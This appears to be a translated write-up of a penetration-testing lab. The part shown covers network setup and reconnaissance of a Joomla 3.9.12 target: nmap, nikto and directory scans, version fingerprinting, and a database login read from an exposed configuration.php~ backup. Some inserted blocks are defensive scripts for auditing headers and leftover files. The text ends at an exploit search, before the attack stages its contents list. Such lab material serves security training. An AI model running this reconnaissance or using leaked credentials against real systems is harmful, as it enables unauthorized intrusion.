Hongri Range 3 (红日靶场-3)

2024-01-02 13:37:28

Contents

Preface

External network penetration

External footprinting

1. arp

2. nmap

3. nikto

4. whatweb

5. gobuster

6. dirsearch

CMS

1. Home page content

2. The /configuration.php~ file

3. The /administrator directory

4. Joomla! version detection

5. joomlascan Python script

6. joomscan Perl script

MySQL

1. Remote login

2. Viewing sensitive data

Logging into the back end

1. Successful login

2. RCE vulnerability

AntSword connection

1. Writing a shell

2. disable_functions bypass

SSH connection

Privilege escalation

Internal network penetration

Lateral movement 1

1. Generating the payload file

2. Starting the listener

3. Adding an internal route

Lateral movement 2

1. Setting up the listener

2. Entering meterpreter

3. Adding an internal route

4. SOCKS5 proxy

1. earthworm tunnelling tool

2. Configuring proxychains4.conf

5. Internal host discovery

1. First module

2. Second module

6. Internal attacks

1. Password brute-forcing

2. psexec tool

3. wmiexec.py

7. Get flag

Preface


In penetration testing, black-box testing and white-box testing are two common approaches used to evaluate the security and weaknesses of a target system. Their meanings and differences are as follows:

1. Black-box testing (Black Box Testing):
   Black-box testing is carried out from an external perspective; the tester knows nothing about the internal structure and implementation details of the system under test. The tester treats the system as a black box, looking only at inputs and outputs without considering how it works internally.
   Black-box testing focuses mainly on checking the system's functionality, security vulnerabilities, misconfigurations and so on. The tester plays the role of an external attacker and tries to find potential vulnerabilities based on the system's observable behaviour and interfaces.

2. White-box testing (White Box Testing):
   White-box testing is carried out from an internal perspective; the tester has full knowledge of the system's internal structure, design and code. The tester can view and analyse internal details such as source code, configuration files and technical documentation.
   White-box testing focuses mainly on evaluating the system's structure, design, security implementation and code quality. The tester can use techniques such as static code analysis and code review to find potential vulnerabilities and security risks.

Black-box and white-box testing each have their own strengths and suitable scenarios. Black-box testing pays more attention to the system's functionality and the user's point of view and can simulate the behaviour of a real attacker. White-box testing pays more attention to the system's internal security and code quality and can analyse implementation details in depth to uncover hidden vulnerabilities.

In practice, penetration tests usually combine black-box and white-box methods to assess a system's security comprehensively. This allows potential vulnerabilities to be identified and fixed from different angles, improving the system's defences.

Lab setup
1. First add a VMnet2 network adapter with the subnet address 192.168.93.0.
2. Start the CentOS target and run "service network restart" to obtain IP addresses. CentOS has two adapters, one bridged and one on VMnet2; the former serves as the external IP and the latter as the internal IP.
3. CentOS is the only target that needs to be changed. Do not touch the others and never reboot them, because some of their services are not configured to start automatically. If you need to shut down, suspend each target first.
4. Because a bridged adapter is used, the Kali attack machine's adapter must also be in bridged mode.
5. On CentOS run "ifconfig eth0" to check whether an IP was obtained; on Kali run "ip a" to check the same.
6. Finally, open the target in a browser to verify that it is reachable.

192.168.93.10 WIN-8GA56TNV3MV
192.168.93.20 WIN2008
192.168.93.30 WIN7
192.168.93.100 192.168.1.21 CentOS
192.168.93.120 Ubuntu
192.168.1.20 kali

This exercise is a black-box test, so no passwords are given. Our goal is to obtain control of the domain controller and find the important files on it.

External network penetration

External footprinting

1. arp

┌──(root㉿ru)-[~/lianxi]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.1.20
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1     00:03:0f:2b:90:20       Digital China (Shanghai) Networks Ltd.
192.168.1.2     d4:8f:a2:9f:51:49       Huawei Device Co., Ltd.
192.168.1.6     3c:55:76:dc:ab:f5       CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.5     7c:b5:66:a5:f0:a5       Intel Corporate
192.168.1.14    7c:b5:66:a5:f0:a5 (42:f1:e2:49:51:a5)   Intel Corporate
192.168.1.13    7c:b5:66:a5:f0:a5 (42:f1:e2:49:51:a5)   Intel Corporate
192.168.1.21    00:0c:29:32:46:c9       VMware, Inc.
192.168.1.4     30:03:c8:49:52:4d (42:f1:e2:49:51:a5)   CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.9     fa:f1:bf:c4:d1:1d (42:f1:e2:49:51:a5)   (Unknown: locally administered)
192.168.1.16    30:03:c8:49:52:4d (42:f1:e2:49:51:a5)   CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.18    30:03:c8:49:52:4d (42:f1:e2:49:51:a5)   CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.7     c4:75:ab:58:e4:8b (42:f1:e2:49:51:a5)   Intel Corporate
192.168.1.8     3c:e9:f7:c0:ef:c7 (42:f1:e2:49:51:a5)   Intel Corporate
192.168.1.17    42:45:ab:5e:e9:ce (42:f1:e2:49:51:a5)   (Unknown: locally administered)

14 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.346 seconds (109.12 hosts/sec). 14 responded

2. nmap

Port scan

┌──(root㉿ru)-[~/lianxi]
└─# nmap -p- 192.168.1.21 --min-rate 10000 -oA ports                    
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 12:06 CST
Nmap scan report for 192.168.1.21
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.45 seconds


How to extract the ports
┌──(root㉿ru)-[~/lianxi]
└─# cat ports.nmap                                                                                                  
# Nmap 7.94 scan initiated Fri Dec  1 12:06:52 2023 as: nmap -p- --min-rate 10000 -oA ports 192.168.1.21
Nmap scan report for 192.168.1.21
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)

# Nmap done at Fri Dec  1 12:06:58 2023 -- 1 IP address (1 host up) scanned in 5.45 seconds

┌──(root㉿ru)-[~/lianxi]
└─# cat ports.nmap | awk '{print($1)}' | head -n 8 | tail -n 3 | awk -F "/" '{print($1)}' | xargs -n3 | sed 's/ /,/g'
22,80,3306

// This step uses the awk, sed, head, tail and xargs commands.
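As an added example (not part of the original post), here is a less fragile way to pull the open ports out of an nmap -oN file. The head/tail pipeline above depends on exactly three open ports sitting on lines 6 to 8; the function below instead selects every line whose first field is port/proto and whose state is open, so it gives the same answer regardless of how many ports or which states appear. The sample file is constructed to match the ports.nmap shown above, with an extra filtered entry added to show that it is skipped.

```shell
# Added example: robust extraction of open ports from an nmap normal-format (-oN) file.
extract_open_ports() {
    # $1: path to an nmap -oN output file
    # Prints the open TCP/UDP port numbers as a comma-separated list (no trailing comma).
    awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" {
             split($1, a, "/"); ports[++n] = a[1]
         }
         END {
             for (i = 1; i <= n; i++) printf "%s%s", ports[i], (i < n ? "," : "\n")
         }' "$1"
}

# Constructed sample in the same shape as the ports.nmap file shown above,
# plus a filtered entry that must not be picked up.
SAMPLE_FILE="$(mktemp)"
cat > "$SAMPLE_FILE" <<'EOF'
# Nmap 7.94 scan initiated Fri Dec  1 12:06:52 2023 as: nmap -p- --min-rate 10000 -oA ports 192.168.1.21
Nmap scan report for 192.168.1.21
Host is up (0.0015s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
443/tcp  filtered https
3306/tcp open     mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)

# Nmap done at Fri Dec  1 12:06:58 2023 -- 1 IP address (1 host up) scanned in 5.45 seconds
EOF

extract_open_ports "$SAMPLE_FILE"   # 22,80,3306
```

The output can be fed straight into the follow-up scan, for example `nmap -sC -sV -p "$(extract_open_ports ports.nmap)" 192.168.1.21`.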

Service and OS detection

┌──(root㉿ru)-[~/lianxi]
└─# nmap -sC -sV -sT -O -p 22,80,3306 192.168.1.21 --min-rate 10000 -oA XX
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 14:22 CST
Nmap scan report for 192.168.1.21
Host is up (0.00028s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
|   1024 25:84:c6:cc:2c:8a:7b:8f:4a:7c:60:f1:a3:c9:b0:22 (DSA)
|_  2048 58:d1:4c:59:2d:85:ae:07:69:24:0a:dd:72:0f:45:a5 (RSA)
80/tcp   open  http       nginx 1.9.4
|_http-title: 502 Bad Gateway
|_http-server-header: nginx/1.9.4
3306/tcp open  tcpwrapped
MAC Address: 00:0C:29:32:46:C9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.63 seconds


UDP scan

┌──(root㉿ru)-[~/lianxi]
└─# nmap -sU 192.168.1.21 --min-rate 10000 -oA udp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 14:23 CST
Nmap scan report for 192.168.1.21
Host is up (0.00021s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
2/udp     closed compressnet
9000/udp  closed cslistener
16862/udp closed unknown
41971/udp closed unknown
46836/udp closed unknown
49185/udp closed unknown
MAC Address: 00:0C:29:32:46:C9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds


Vulnerability scan

┌──(root㉿ru)-[~/lianxi]
└─# nmap --script=vuln -p 22,80,3306 192.168.1.21 --min-rate 10000 -oA vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 15:20 CST
Nmap scan report for 192.168.1.21
Host is up (0.00021s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
| http-dombased-xss:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.21
|   Found the following indications of potential DOM based XSS:
|
|     Source: window.open(this.href,'win2','status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no')
|_    Pages: http://192.168.1.21:80/, http://192.168.1.21:80/, http://192.168.1.21:80/, http://192.168.1.21:80/, http://192.168.1.21:80/index.php/6-your-template, http://192.168.1.21:80/index.php/5-your-modules, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php/4-about-your-home-page
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.21
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://192.168.1.21:80/
|     Form id: mod-search-searchword87
|     Form action: /index.php
|
|     Path: http://192.168.1.21:80/index.php/6-your-template
|     Form id: mod-search-searchword87
|     Form action: /index.php
|
|     Path: http://192.168.1.21:80/index.php/login
|     Form id: mod-search-searchword87
|     Form action: /index.php/login
|
|     Path: http://192.168.1.21:80/index.php/login
|     Form id: username-lbl
|     Form action: /index.php/login?task=user.login
|
|     Path: http://192.168.1.21:80/index.php/5-your-modules
|     Form id: mod-search-searchword87
|     Form action: /index.php
|
|     Path: http://192.168.1.21:80/index.php/author-login
|     Form id: mod-search-searchword87
|     Form action: /index.php/author-login
|
|     Path: http://192.168.1.21:80/index.php/author-login
|     Form id: username-lbl
|     Form action: /index.php/author-login?task=user.login
|
|     Path: http://192.168.1.21:80/index.php
|     Form id: mod-search-searchword87
|     Form action: /index.php
|
|     Path: http://192.168.1.21:80/index.php/4-about-your-home-page
|     Form id: mod-search-searchword87
|_    Form action: /index.php
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|   /administrator/: Possible admin folder
|   /administrator/index.php: Possible admin folder
|   /robots.txt: Robots file
|   /administrator/manifests/files/joomla.xml: Joomla version 3.9.12
|   /language/en-GB/en-GB.xml: Joomla version 3.9.12
|   /htaccess.txt: Joomla!
|   /README.txt: Interesting, a readme.
|   /bin/: Potentially interesting folder
|   /cache/: Potentially interesting folder
|   /images/: Potentially interesting folder
|   /includes/: Potentially interesting folder
|   /libraries/: Potentially interesting folder
|   /modules/: Potentially interesting folder
|   /templates/: Potentially interesting folder
|_  /tmp/: Potentially interesting folder
3306/tcp open  mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:32:46:C9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 74.52 seconds


3. nikto

┌──(root㉿ru)-[~/lianxi]
└─# nikto -h 192.168.1.21 nikto.txt
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.1.21
+ Target Hostname:    192.168.1.21
+ Target Port:        80
+ Start Time:         2023-12-01 15:19:50 (GMT8)
---------------------------------------------------------------------------
+ Server: nginx/1.9.4
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /robots.txt: Entry '/libraries/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/modules/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/cache/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/layouts/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/includes/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/administrator/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/cli/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/tmp/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/plugins/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/bin/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/language/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/components/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 14 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /administrator/: This might be interesting.
+ /bin/: This might be interesting.
+ /includes/: This might be interesting.
+ /tmp/: This might be interesting.
+ /LICENSE.txt: License file found may identify site software.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ 8924 requests: 0 error(s) and 24 item(s) reported on remote host
+ End Time:           2023-12-01 15:20:26 (GMT8) (36 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
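Nikto's first two findings are missing response headers, and the Server header gives away the exact nginx version. The following added example (not code from the original post) checks a saved response-header block for these points offline, so the same check can be run against a captured response or a staging server without a scanner. The header block is constructed to match what whatweb printed for this target; the header list is an assumption that extends nikto's two findings with Content-Security-Policy.

```shell
# Added example: audit a saved HTTP response-header block for the hardening
# headers nikto flagged as absent, and for version disclosure in Server.
REQUIRED_HEADERS="X-Frame-Options X-Content-Type-Options Content-Security-Policy"

missing_security_headers() {
    # $1: file containing raw response headers, one per line
    # Prints the names of required headers that are absent, one per line.
    for h in $REQUIRED_HEADERS; do
        if ! grep -qi "^$h:" "$1"; then
            echo "$h"
        fi
    done
}

server_discloses_version() {
    # $1: header file. Exit 0 when the Server header carries a version number
    # (e.g. "nginx/1.9.4"), exit 1 otherwise.
    grep -i '^Server:' "$1" | grep -Eq '[0-9]+\.[0-9]+'
}

# Constructed sample: the shape of the headers whatweb showed for the target.
HEADERS_FILE="$(mktemp)"
cat > "$HEADERS_FILE" <<'EOF'
HTTP/1.1 200 OK
Server: nginx/1.9.4
Content-Type: text/html; charset=utf-8
Set-Cookie: d238a471ae12a7732425ae4995e23fce=r8kse6ihf5gjio9jiuegcd1qvj; path=/; HttpOnly
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
EOF

echo "Missing headers:"
missing_security_headers "$HEADERS_FILE"
if server_discloses_version "$HEADERS_FILE"; then
    echo "Server header discloses a version"
fi
```

On the nginx side the two headers nikto flagged are added with `add_header X-Frame-Options "SAMEORIGIN" always;` and `add_header X-Content-Type-Options "nosniff" always;`, and `server_tokens off;` removes the version from the Server header.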


4. whatweb

┌──(root㉿ru)-[~/lianxi]
└─# whatweb -v http://192.168.1.21
WhatWeb report for http://192.168.1.21
Status    : 200 OK
Title     : Home
IP        : 192.168.1.21
Country   : RESERVED, ZZ

Summary   : Bootstrap, Cookies[d238a471ae12a7732425ae4995e23fce], HTML5, HTTPServer[nginx/1.9.4], HttpOnly[d238a471ae12a7732425ae4995e23fce], JQuery, MetaGenerator[Joomla! - Open Source Content Management], nginx[1.9.4], OpenSearch[http://192.168.1.21/index.php/component/search/?layout=blog&id=9&Itemid=101&format=opensearch], Script

Detected Plugins:
[ Bootstrap ]
        Bootstrap is an open source toolkit for developing with 
        HTML, CSS, and JS. 

        Website     : https://getbootstrap.com/

[ Cookies ]
        Display the names of cookies in the HTTP headers. The 
        values are not returned to save on space. 

        String       : d238a471ae12a7732425ae4995e23fce

[ HTML5 ]
        HTML version 5, detected by the doctype declaration 


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        String       : nginx/1.9.4 (from server string)

[ HttpOnly ]
        If the HttpOnly flag is included in the HTTP set-cookie 
        response header and the browser supports it then the cookie 
        cannot be accessed through client side script - More Info: 
        http://en.wikipedia.org/wiki/HTTP_cookie 

        String       : d238a471ae12a7732425ae4995e23fce

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse 
        HTML documents, handle events, perform animations, and add 
        AJAX. 

        Website     : http://jquery.com/

[ MetaGenerator ]
        This plugin identifies meta generator tags and extracts its 
        value. 

        String       : Joomla! - Open Source Content Management

[ OpenSearch ]
        This plugin identifies open search and extracts the URL. 
        OpenSearch is a collection of simple formats for the 
        sharing of search results. 

        String       : http://192.168.1.21/index.php/component/search/?layout=blog&id=9&Itemid=101&format=opensearch

[ Script ]
        This plugin detects instances of script HTML elements and 
        returns the script language/type. 


[ nginx ]
        Nginx (Engine-X) is a free, open-source, high-performance 
        HTTP server and reverse proxy, as well as an IMAP/POP3 
        proxy server. 

        Version      : 1.9.4
        Website     : http://nginx.net/

HTTP Headers:
        HTTP/1.1 200 OK
        Server: nginx/1.9.4
        Date: Mon, 07 Oct 2019 08:29:39 GMT
        Content-Type: text/html; charset=utf-8
        Content-Length: 4001
        Connection: close
        Set-Cookie: d238a471ae12a7732425ae4995e23fce=r8kse6ihf5gjio9jiuegcd1qvj; path=/; HttpOnly
        Expires: Wed, 17 Aug 2005 00:00:00 GMT
        Last-Modified: Fri, 01 Dec 2023 07:23:51 GMT
        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        Pragma: no-cache
        Vary: Accept-Encoding
        Content-Encoding: gzip



5. gobuster

┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.1.21 -w directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.21
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 313] [--> http://192.168.1.21/images/]
/media                (Status: 301) [Size: 312] [--> http://192.168.1.21/media/]
/templates            (Status: 301) [Size: 316] [--> http://192.168.1.21/templates/]
/modules              (Status: 301) [Size: 314] [--> http://192.168.1.21/modules/]
/bin                  (Status: 301) [Size: 310] [--> http://192.168.1.21/bin/]
/plugins              (Status: 301) [Size: 314] [--> http://192.168.1.21/plugins/]
/includes             (Status: 301) [Size: 315] [--> http://192.168.1.21/includes/]
/language             (Status: 301) [Size: 315] [--> http://192.168.1.21/language/]
/components           (Status: 301) [Size: 317] [--> http://192.168.1.21/components/]
/cache                (Status: 301) [Size: 312] [--> http://192.168.1.21/cache/]
/libraries            (Status: 301) [Size: 316] [--> http://192.168.1.21/libraries/]
/tmp                  (Status: 301) [Size: 310] [--> http://192.168.1.21/tmp/]
/layouts              (Status: 301) [Size: 314] [--> http://192.168.1.21/layouts/]
/administrator        (Status: 301) [Size: 320] [--> http://192.168.1.21/administrator/]
/cli                  (Status: 301) [Size: 310] [--> http://192.168.1.21/cli/]


6. dirsearch

┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# dirsearch -u http://192.168.1.21 -e*

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30 | Wordlist size: 15490

Output File: /root/.dirsearch/reports/192.168.1.21/_23-12-01_15-26-31.txt

Error Log: /root/.dirsearch/logs/errors-23-12-01_15-26-31.log

Target: http://192.168.1.21/

[15:26:31] Starting:
[15:26:50] 200 -   18KB - /LICENSE.txt
[15:26:50] 200 -    5KB - /README.txt
[15:26:59] 403 -  277B  - /administrator/.htaccess
[15:26:59] 301 -  320B  - /administrator  ->  http://192.168.1.21/administrator/
[15:26:59] 200 -    5KB - /administrator/
[15:26:59] 200 -    2KB - /administrator/includes/
[15:26:59] 200 -   31B  - /administrator/cache/
[15:26:59] 200 -    5KB - /administrator/index.php
[15:26:59] 301 -  325B  - /administrator/logs  ->  http://192.168.1.21/administrator/logs/
[15:26:59] 200 -   31B  - /administrator/logs/
[15:27:02] 301 -  310B  - /bin  ->  http://192.168.1.21/bin/
[15:27:02] 200 -   31B  - /bin/
[15:27:03] 301 -  312B  - /cache  ->  http://192.168.1.21/cache/
[15:27:03] 200 -   31B  - /cache/
[15:27:04] 200 -   31B  - /cli/
[15:27:04] 301 -  317B  - /components  ->  http://192.168.1.21/components/
[15:27:04] 200 -   31B  - /components/
[15:27:05] 200 -    0B  - /configuration.php
[15:27:05] 200 -    2KB - /configuration.php~
[15:27:10] 200 -    3KB - /htaccess.txt
[15:27:11] 301 -  313B  - /images  ->  http://192.168.1.21/images/
[15:27:11] 200 -   31B  - /images/
[15:27:11] 301 -  315B  - /includes  ->  http://192.168.1.21/includes/
[15:27:11] 200 -   31B  - /includes/
[15:27:11] 200 -   16KB - /index.php
[15:27:11] 200 -    9KB - /index.php/login/
[15:27:13] 301 -  315B  - /language  ->  http://192.168.1.21/language/
[15:27:13] 200 -   31B  - /layouts/
[15:27:13] 301 -  316B  - /libraries  ->  http://192.168.1.21/libraries/
[15:27:13] 200 -   31B  - /libraries/
[15:27:15] 301 -  312B  - /media  ->  http://192.168.1.21/media/
[15:27:15] 200 -   31B  - /media/
[15:27:16] 301 -  314B  - /modules  ->  http://192.168.1.21/modules/
[15:27:16] 200 -   31B  - /modules/
[15:27:20] 200 -   31B  - /plugins/
[15:27:21] 301 -  314B  - /plugins  ->  http://192.168.1.21/plugins/
[15:27:23] 200 -  829B  - /robots.txt
[15:27:24] 403 -  277B  - /server-status
[15:27:24] 403 -  277B  - /server-status/
[15:27:28] 301 -  316B  - /templates  ->  http://192.168.1.21/templates/
[15:27:28] 200 -   31B  - /templates/
[15:27:28] 200 -   31B  - /templates/index.html
[15:27:28] 200 -    0B  - /templates/protostar/
[15:27:28] 200 -    0B  - /templates/system/
[15:27:28] 200 -    0B  - /templates/beez3/
[15:27:30] 301 -  310B  - /tmp  ->  http://192.168.1.21/tmp/
[15:27:30] 200 -   31B  - /tmp/
[15:27:35] 200 -    2KB - /web.config.txt


CMS

1. Home page content

The home page is some blog content. After exploring it, no exploitable point was found.



According to the hint, the site uses the Protostar template.


Through probing, different content can be accessed by changing this id number, although it seems only ids up to 6 can be reached.

2. The /configuration.php~ file


Through directory enumeration we found the site's configuration file, and in it the database account and password.

Username: testuser
Password: cvcvgjASD!@
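The root cause here is an editor backup copy (the trailing `~`) of configuration.php left in the web root: nginx does not hand a `.php~` file to PHP, so it is served as plain text with the database credentials inside. The following added example (not code from the original post) is the check a site owner would run to find such leftovers before a scanner does. The web root is a constructed temporary directory, and the credential value in it is a placeholder.

```shell
# Added example: find editor/backup leftovers in a web root that would be
# served as plain text (the configuration.php~ case above).
find_backup_leftovers() {
    # $1: web root directory
    # Prints matching file paths relative to the root, sorted, one per line.
    ( cd "$1" && find . -type f \
          \( -name '*~' -o -name '*.bak' -o -name '*.orig' -o -name '*.old' -o -name '*.swp' \) \
        | sed 's|^\./||' | sort )
}

# Constructed web root mirroring the dirsearch findings above.
WEBROOT="$(mktemp -d)"
mkdir -p "$WEBROOT/administrator"
: > "$WEBROOT/configuration.php"            # live config: 0 bytes when fetched, PHP runs it
: > "$WEBROOT/administrator/index.php"
# Editor backup: not a PHP handler match, so its source would be returned verbatim.
# The credential here is a placeholder, not a value from any real system.
printf '<?php class JConfig { public $user = "dbuser-placeholder"; }\n' > "$WEBROOT/configuration.php~"
: > "$WEBROOT/index.php.bak"

find_backup_leftovers "$WEBROOT"
```

Anything this reports should be deleted from the deployed tree; as a second layer, an nginx rule such as `location ~ (~|\.bak|\.orig|\.old|\.swp)$ { return 404; }` refuses to serve such names even if an editor recreates one later.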

3. The /administrator directory


It is indeed Joomla!; on to the next probing step.

4. Joomla! version detection

We can use the auxiliary module in msf to scan for the version.

msf6 > search Joomla_version

Matching Modules
================

   #  Name                                   Disclosure Date  Rank    Check  Description
   -  ----                                   ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/joomla_version                   normal  No     Joomla Version Scanner


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/joomla_version

msf6 >


msf6 > use 0
msf6 auxiliary(scanner/http/joomla_version) > show options

Module options (auxiliary/scanner/http/joomla_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the Joomla application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/http/joomla_version) > set rhosts 192.168.1.21
rhosts => 192.168.1.21
msf6 auxiliary(scanner/http/joomla_version) > exploit

[*] Server: nginx/1.9.4
[+] Joomla version: 3.9.12
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


The scan shows the CMS version is 3.9.12, so we can now look for a matching exploit.
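Every tool in this section (nmap's http-enum, the msf module, joomscan) reads the version from the same world-readable manifest that http-enum listed above, /administrator/manifests/files/joomla.xml. The following added example (not code from the original post) does the same parsing offline and compares the result against a patch baseline, which is what an owner of the site would run from an inventory job. The manifest content is a constructed fragment in the shape of Joomla's files manifest, and BASELINE is a placeholder for whatever version the local patch policy requires.

```shell
# Added example: read the Joomla version from a files manifest and compare it
# with a required baseline using a numeric dotted-version comparison.
joomla_version_from_manifest() {
    # $1: path to joomla.xml; prints the first <version>...</version> value.
    sed -n 's/.*<version>\([^<]*\)<\/version>.*/\1/p' "$1" | head -n 1
}

version_lt() {
    # Exit 0 when dotted version $1 is numerically lower than $2, exit 1 otherwise.
    # Missing components count as 0, so 3.9 < 3.9.1 and 3.10.0 > 3.9.13.
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            xi = (i <= na) ? x[i] + 0 : 0
            yi = (i <= nb) ? y[i] + 0 : 0
            if (xi < yi) exit 0
            if (xi > yi) exit 1
        }
        exit 1
    }'
}

# Constructed manifest fragment; the outer <extension version="..."> attribute
# is the manifest format version and must not be confused with the CMS version.
MANIFEST="$(mktemp)"
cat > "$MANIFEST" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<extension version="3.6" type="file" method="upgrade">
    <name>files_joomla</name>
    <author>Joomla! Project</author>
    <version>3.9.12</version>
    <description>FILES_JOOMLA_XML_DESCRIPTION</description>
</extension>
EOF

BASELINE="3.9.13"   # placeholder: the minimum version your patch policy accepts
FOUND="$(joomla_version_from_manifest "$MANIFEST")"
if version_lt "$FOUND" "$BASELINE"; then
    echo "Joomla $FOUND is below baseline $BASELINE: update required"
else
    echo "Joomla $FOUND meets baseline $BASELINE"
fi
```

The same manifest being reachable over HTTP is what makes fingerprinting trivial; blocking direct requests to /administrator/manifests/ at the web server removes that shortcut without affecting the CMS.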

┌──(root㉿ru)-[~/lianxi]
└─# searchsploit Joomla 3.9.12
